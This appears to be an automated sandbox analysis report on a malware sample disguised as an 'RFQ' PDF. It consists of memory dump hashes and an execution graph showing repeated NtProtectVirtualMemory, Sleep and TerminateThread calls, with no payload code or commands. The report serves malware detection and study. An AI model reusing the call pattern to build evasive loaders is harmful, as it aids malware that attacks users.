                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e2394002d23da5a932a1ba025d5b2ae8ba03093852911ad904bf61307c730053
                              • Instruction ID: 3ffc354aa0360d249aae870fd82fdc1720a1c01b248a5574ee3ea16680b1d3b0
                              • Opcode Fuzzy Hash: e2394002d23da5a932a1ba025d5b2ae8ba03093852911ad904bf61307c730053
                              • Instruction Fuzzy Hash: FF810E71604389DFDB7A8E25CE51BEE77B2AF45340F05442EDE8AAB260E3345A40DF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6e6565743e9bbfb8c5bf5188a6d01a6e96a5a358165053449dd9829afcc7538
                              • Instruction ID: acebcc585ef06036e6d8ab5e592ef0545523ca8502d6771296fa27b7e101f5b7
                              • Opcode Fuzzy Hash: b6e6565743e9bbfb8c5bf5188a6d01a6e96a5a358165053449dd9829afcc7538
                              • Instruction Fuzzy Hash: B9810F31604389DFDB7A8E25CE51BEE77E6AF45340F05442EDE8AAB211E3344A41DF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 68a0b11cbce87c6543dddbb6f55e142a5b7f41dc5daa522345e452f3022ff664
                              • Instruction ID: a5a997ea6a8ad2daead6b45d3e962893406544b5fbdb61c41b666b82a98ac583
                              • Opcode Fuzzy Hash: 68a0b11cbce87c6543dddbb6f55e142a5b7f41dc5daa522345e452f3022ff664
                              • Instruction Fuzzy Hash: 5F811031508389DFDB798E25CE51BEE77B2AF45340F05442EDD8AAB251E3344A40DF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cfc8082fe7183aa6469eb83c9d375ec904fed1bdef08e3692d1e9677b88926c4
                              • Instruction ID: 011e4af28d26ed1595220078de386dfd12053bd96cf875a8192b31e0d2cb0778
                              • Opcode Fuzzy Hash: cfc8082fe7183aa6469eb83c9d375ec904fed1bdef08e3692d1e9677b88926c4
                              • Instruction Fuzzy Hash: EA710F7160438ADFDF7A8E25CE55BEE77E2AF49340F05442ACD8AAB210E7345A40DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e5df1fb349fc35d03666b134d3a940105002a14021bc6ffa50bdd4afb7aa0207
                              • Instruction ID: 6e7ac59ff78590c6e94d9f981a15ff957dcbe0a5d5274b1801a2f773440c066a
                              • Opcode Fuzzy Hash: e5df1fb349fc35d03666b134d3a940105002a14021bc6ffa50bdd4afb7aa0207
                              • Instruction Fuzzy Hash: 4471F17160438ADFDB7A8E25CE41BEE77E6AF49340F05442EDD8AAB210E7345A40DF16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3bb1decf44737b746c53a5df8eb6cdbcf04317eba3f3de81438318280a586f48
                              • Instruction ID: 89c9ad4fe83524661fdeb904c0478bc4fe079715631babea7f9727b310323265
                              • Opcode Fuzzy Hash: 3bb1decf44737b746c53a5df8eb6cdbcf04317eba3f3de81438318280a586f48
                              • Instruction Fuzzy Hash: 1F71EE7150438ADFDB7A8E25CE51BEE77A6AF49340F05442ECD8AAB251E7344A40DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 072a14d0a4a3972b498dcf6a77dcac8c3c6ebb5240095a6dfe0088537da50965
                              • Instruction ID: 0bbd172b30c5478ae374bfb85919b159a2ca89425143832f0bcb2569040c6e6c
                              • Opcode Fuzzy Hash: 072a14d0a4a3972b498dcf6a77dcac8c3c6ebb5240095a6dfe0088537da50965
                              • Instruction Fuzzy Hash: D6711171504389DFCB7A8E25CE41BEE77E5AF49340F05442ECD8AAB211E3344A40EF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2aba9672662004b215847ab143e1285de968b7f4b6178f62d935657e015e050f
                              • Instruction ID: 372bae82692f163ccb58d900137902100bbca3d4c4f6ca051950d3cf9fc64661
                              • Opcode Fuzzy Hash: 2aba9672662004b215847ab143e1285de968b7f4b6178f62d935657e015e050f
                              • Instruction Fuzzy Hash: 9B61FE3150838ADFCB7A8E25CE51BEE77A1AF06340F45442EDD8AAB251E7354A40DF26
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c19dd4a71ba1cae2585aa30e349d9cac8626dbb24c643973550751c3c74a2b3a
                              • Instruction ID: f3bf978c150317e8710b1a97a6ba827d0769d9b170f0a4150045effaeb5267b3
                              • Opcode Fuzzy Hash: c19dd4a71ba1cae2585aa30e349d9cac8626dbb24c643973550751c3c74a2b3a
                              • Instruction Fuzzy Hash: E9614772904384CBDB72CF39C9947DBBBE2AF96304F59425ACC8D4B266C335A642C712
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6efab7b751cb084277ac7177c79de4c5f723154c4918002fc48da9dc6d8b4562
                              • Instruction ID: 48f9f06abfe0b90e5e3f62a28c22c704c1b24fa3ded8d5c1a8d614eb6374e3c6
                              • Opcode Fuzzy Hash: 6efab7b751cb084277ac7177c79de4c5f723154c4918002fc48da9dc6d8b4562
                              • Instruction Fuzzy Hash: EA511E7150838ADBCB7A8E25CE41BEE77F6AF05340F05442ECD8A9B211E3345A40EF16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f4d135ee9ed3bc41d3a74585691e50e50b2292e26e66f61d0f1e85a218d911e7
                              • Instruction ID: dcd46eaa3b58acb93504cb9b485a022e5e220504fe607891fc92c6e063963331
                              • Opcode Fuzzy Hash: f4d135ee9ed3bc41d3a74585691e50e50b2292e26e66f61d0f1e85a218d911e7
                              • Instruction Fuzzy Hash: BE51FD3150838ADFCB7A8E25CE51BEE77E6AF05340F05442EDD8A9B261E7344A40EF16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3249085042b5c81622bb30ec217fd686faed98189aece80b2d8dfdfc3beb419a
                              • Instruction ID: 01e2cf8b276d2ef7b5d123c4d0f61505733a43f25e34f4765dbe00071480a08f
                              • Opcode Fuzzy Hash: 3249085042b5c81622bb30ec217fd686faed98189aece80b2d8dfdfc3beb419a
                              • Instruction Fuzzy Hash: AAB092FA2026C18FFB45DF08C482B0073B0FB10A88F080490E402CB712C224E900CA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 42df08f4c91467dfd747bad63ccbad0b2141c3406cdb54ecfc2dcf843d4e06c8
                              • Instruction ID: f524559b10004a760a8e9cebaeb784666b97cd603d29b2a10d0d0579ea74874d
                              • Opcode Fuzzy Hash: 42df08f4c91467dfd747bad63ccbad0b2141c3406cdb54ecfc2dcf843d4e06c8
                              • Instruction Fuzzy Hash: C8B09235651640CFCEA6CA08C180E8473B0FB01600B8104D0E80187A51D264E801CA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:3.4%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:34
                              Total number of Limit Nodes:0

                              Graph

                              execution_graph 659 56ff15 Sleep 660 56ff22 NtProtectVirtualMemory 659->660 662 56ffa8 660->662 663 56fdb5 664 56fe15 NtProtectVirtualMemory 663->664 727 56fe95 728 56ff10 Sleep 727->728 730 56ff22 NtProtectVirtualMemory 728->730 732 56ffa8 730->732 671 56fe50 673 56fed0 671->673 672 56ff22 NtProtectVirtualMemory 676 56ffa8 672->676 673->672 674 56ff16 Sleep 673->674 674->672 739 56fcb9 740 56fd34 NtProtectVirtualMemory 739->740 735 56fe85 736 56ff04 NtProtectVirtualMemory 735->736 738 56ffa8 736->738 666 56f9e2 667 56f966 TerminateThread 666->667 668 56f9e5 TerminateThread 666->668 670 56fa36 667->670 668->670 692 56f961 693 56f9dc TerminateThread 692->693 694 56fa36 693->694 713 56fc21 715 56fc9c 713->715 714 56fe39 715->714 716 56fe18 NtProtectVirtualMemory 715->716 695 56f96d 696 56f971 695->696 696->696 697 56f9dc TerminateThread 696->697 698 56fa36 697->698

                              Callgraph


                              Executed Functions

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 56fec2-56fed3 call 56fc5e 4 56fed5-56fed7 0->4 5 56fedc-56fee2 0->5 4->5 6 56ff24-56ffa0 NtProtectVirtualMemory 5->6 7 56fee4-56ff22 Sleep 5->7 10 56ffa8-56ffb9 6->10 11 56ffa3 call 56fc5e 6->11 7->6 13 56ffbb 10->13 11->10 13->13
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: b3d607e475376b6cf51903a3afa98b2e08050bcdd01cadb338bb7275def0159c
                              • Instruction ID: cbff10af96eb3b41cd5ecb86ee968032617a488ea0a9ec3a0c1e6d1523666203
                              • Opcode Fuzzy Hash: b3d607e475376b6cf51903a3afa98b2e08050bcdd01cadb338bb7275def0159c
                              • Instruction Fuzzy Hash: C20122709043019FF7405F20D64DB96BBA4BF113A5F128195EC128B0B3C3B98C80CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 66 56fd07-56fd19 68 56fd1f-56fd22 66->68 69 56fe39-56feb6 66->69 68->69 70 56fd28-56fd6f call 56fc31 call 56fc5e 68->70 70->69 78 56fd75-56fd78 70->78 78->69 79 56fd7e-56fe36 NtProtectVirtualMemory 78->79
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a5229797a4eb1c09ec6e4e97fbdd9f7a2b33e593acba13ba1391b1d6d5b122d1
                              • Instruction ID: 4291e0564a2e5fd5583f1e8873ac85b40d3727f2fa937cada9e1008007eaf36c
                              • Opcode Fuzzy Hash: a5229797a4eb1c09ec6e4e97fbdd9f7a2b33e593acba13ba1391b1d6d5b122d1
                              • Instruction Fuzzy Hash: CB1129B28013019FC7409F74E98EE2A3E69FF15360B6106A5D946CB176C735DC819B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 110 56fc21-56fd6f call 56fc31 call 56fc5e 119 56fd75-56fd78 110->119 120 56fe39-56feb6 110->120 119->120 121 56fd7e-56fe36 NtProtectVirtualMemory 119->121
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 678a95198543671f4fb72feb7b581346c461a59420301e8f06170be05477cbd3
                              • Instruction ID: 474b55010c42ff2ba8c1b6f72e3c5715edc850df46b4a6da416308345564cdf7
                              • Opcode Fuzzy Hash: 678a95198543671f4fb72feb7b581346c461a59420301e8f06170be05477cbd3
                              • Instruction Fuzzy Hash: 6F0104B29053028FD3019F34A98E9253F74BE5936076546A6D845CB176C365DC429B26
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 127 56fd00-56fd19 130 56fd1f-56fd22 127->130 131 56fe39-56feb6 127->131 130->131 132 56fd28-56fd6f call 56fc31 call 56fc5e 130->132 132->131 140 56fd75-56fd78 132->140 140->131 141 56fd7e-56fe36 NtProtectVirtualMemory 140->141
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: e8a7cb7e18356e44e6a2bd39efba1514513fba7e6b0ec14bdcbf20f24f55903b
                              • Instruction ID: 6a07659f5602a76687b0c8a91f56f8b57b2a9605355380e050a8554a4b862365
                              • Opcode Fuzzy Hash: e8a7cb7e18356e44e6a2bd39efba1514513fba7e6b0ec14bdcbf20f24f55903b
                              • Instruction Fuzzy Hash: E601D2B29003029FD7109F35E98EA2A3F29FF143A0B5106A5E946CB177C736DC819B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 0e6235905855202fb46aa23886b589d57845d9fce2fba2c6139c3b56af09a38d
                              • Instruction ID: 775e3d082a4c098dbd3f27ac0ad0a64dbb87b992e90c21f50857a6d61a9b4c6e
                              • Opcode Fuzzy Hash: 0e6235905855202fb46aa23886b589d57845d9fce2fba2c6139c3b56af09a38d
                              • Instruction Fuzzy Hash: 1D0145B19053028FC3009F34A98E92A3F74FF053A032646E6D845CB177C365E8419B26
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 145 56fcad-56fd6f call 56fc31 call 56fc5e 152 56fd75-56fd78 145->152 153 56fe39-56feb6 145->153 152->153 154 56fd7e-56fe36 NtProtectVirtualMemory 152->154
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: ce7d6f169314ec977da2ddf83c1aef1518c33d2d077b2b1bc50f48b57588ac9d
                              • Instruction ID: c1d412a9e2093a8b7f82c0423fbb8b1e82ae91dc7d31442083047760ef20cedd
                              • Opcode Fuzzy Hash: ce7d6f169314ec977da2ddf83c1aef1518c33d2d077b2b1bc50f48b57588ac9d
                              • Instruction Fuzzy Hash: 54017BF19003028FD3009F34E98E9293F38FF143A076146A6D946C717AC721E841A725
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 160 56fc96-56fd19 162 56fd1f-56fd22 160->162 163 56fe39-56feb6 160->163 162->163 164 56fd28-56fd6f call 56fc31 call 56fc5e 162->164 164->163 172 56fd75-56fd78 164->172 172->163 173 56fd7e-56fe36 NtProtectVirtualMemory 172->173
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 816d84d5e1b550b7413a6a4b195e3004ac0bf39d398f85409d205702c574b5cc
                              • Instruction ID: d0ce33d7aa8ddfd53205c5f7bb631e6797d209395485e1af3042ecc15c7847bf
                              • Opcode Fuzzy Hash: 816d84d5e1b550b7413a6a4b195e3004ac0bf39d398f85409d205702c574b5cc
                              • Instruction Fuzzy Hash: 4001F7B28003028FD7109F34E98EA2A3F29FF14360F6116A5D906CB1B7C735DC819B25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 177 56fead-56ffa0 NtProtectVirtualMemory 181 56ffa8-56ffb9 177->181 182 56ffa3 call 56fc5e 177->182 183 56ffbb 181->183 182->181 183->183
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FFA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: eaf0bc9078ed2f95f90ca520a36507b09693fa61f8f7ed02603ced4eb0c4e292
                              • Instruction ID: b84225aa8db2cfbeccc7010bc219e11cc133ee5e4268f9d5db34aedee129165c
                              • Opcode Fuzzy Hash: eaf0bc9078ed2f95f90ca520a36507b09693fa61f8f7ed02603ced4eb0c4e292
                              • Instruction Fuzzy Hash: 6AF044B5C483409FE3011935D94D39ABFA4BF253A4F228668EC92871B1C3AD8D40CF80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 184 56fcb9-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 7215c32a5cd0461e3534dabf3b7b775fa15c4e430ad44c83e46ed2920a2b55d2
                              • Instruction ID: 541a75a014635228c68ccbcfe604fbda6fe01c92f7aa98248982fde90a077e0e
                              • Opcode Fuzzy Hash: 7215c32a5cd0461e3534dabf3b7b775fa15c4e430ad44c83e46ed2920a2b55d2
                              • Instruction Fuzzy Hash: 09F050F6841210CFD3009F34EA0E9643FB4FE1E3B43655792D885C7275C325E8019B18
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 189 56fd30-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 8e26711568805b9a6e7d9de18f5992c15a22727494236228152dc0468ba57d5d
                              • Instruction ID: 8e5049a93ada36c4122b57c8367f6bb2773df6c2a9a19ba912523908dd5d26ab
                              • Opcode Fuzzy Hash: 8e26711568805b9a6e7d9de18f5992c15a22727494236228152dc0468ba57d5d
                              • Instruction Fuzzy Hash: F7F020F28012018FC3009F34DA0EA257FA4FE2D3B036593C6C89AC76B6C321D8055B24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 197 56fd59-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: b99be0aaa30749070e305b7adddb96e7fcb0857d874ccb8900d916b8809fc9a7
                              • Instruction ID: 5b90382226e323c3185ed86594d1a3d9766bbe260fafd4eea4739c93ab74f08d
                              • Opcode Fuzzy Hash: b99be0aaa30749070e305b7adddb96e7fcb0857d874ccb8900d916b8809fc9a7
                              • Instruction Fuzzy Hash: 18E020769012118BD200AF28EE4FE755EB6E9563B8338CA63DC17C32A5C319D9019720
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 193 56fd4d-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 944fc3a6f04d00206d563a1596afd86a9606fbed106cce3f55fa7767eca45634
                              • Instruction ID: ee75debf2873ba6261a5ca500c480c6fbb71a8232ca8d2f14cd7193823e9f6a6
                              • Opcode Fuzzy Hash: 944fc3a6f04d00206d563a1596afd86a9606fbed106cce3f55fa7767eca45634
                              • Instruction Fuzzy Hash: 1CE02BF1901211CFD3048F39AA4D9793F78BF193B837587A7D955C72A5C360E8419718
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 201 56fdb5-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 70876a7d89a63c1f4378f1ddba55173bb840542a44a9785cde6c1f6f641684e0
                              • Instruction ID: dcc8ee8e41cd6fa3f1cb38288a79a2925de19322a29607a62a7d8a87844583f6
                              • Opcode Fuzzy Hash: 70876a7d89a63c1f4378f1ddba55173bb840542a44a9785cde6c1f6f641684e0
                              • Instruction Fuzzy Hash: B9E022F20012018FC300DF34DA0EA293F74FF182B436583C6D85ACB5BAC324C4099B18
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FFA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: bb179ebbd9c7a4f58f6b974b1671c58833cff8b4dd4f2972178de6fd41aab561
                              • Instruction ID: 4748f64aecf7339fcc508e71e36ec7b5aa204fb9e0eef4d7179f59f7a10e4a67
                              • Opcode Fuzzy Hash: bb179ebbd9c7a4f58f6b974b1671c58833cff8b4dd4f2972178de6fd41aab561
                              • Instruction Fuzzy Hash: DFE09270D492908FE2456E36A10E299BFB5BE153A5B518469989247135836D5D44CF01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: edd0a00126b3d80af91fab243cf447798f413e9f90ddc82d26b5a1f3375154ff
                              • Instruction ID: 746befd479744594d45d00703da676159f08d21e8a760930059be23fe6e14851
                              • Opcode Fuzzy Hash: edd0a00126b3d80af91fab243cf447798f413e9f90ddc82d26b5a1f3375154ff
                              • Instruction Fuzzy Hash: 4ED0C23160115187D245673C6A0D474AF386E237B53B09753D479C26BAC3019C01D654
                              Uniqueness

